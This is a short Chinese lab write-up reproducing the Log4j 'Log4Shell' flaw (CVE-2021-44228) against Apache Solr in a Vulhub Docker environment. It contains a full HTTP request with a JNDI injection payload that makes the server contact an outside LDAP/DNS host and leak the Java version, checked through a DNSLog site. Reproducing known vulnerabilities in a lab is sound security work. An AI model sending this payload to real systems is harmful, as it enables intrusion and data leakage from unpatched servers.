Log4j 2 (CVE-2021-44228)漏洞复现
一、复现环境
Vulhub:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
二、复现过程
- 拉取docker环境
服务器启动后,便可通过地址:http://your-ip:8983
查看 Apache Solr的Dashboard - JNDI注入
使用bp回放Send有效载荷:
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
找一个DNSLog类网站,便可回显信息: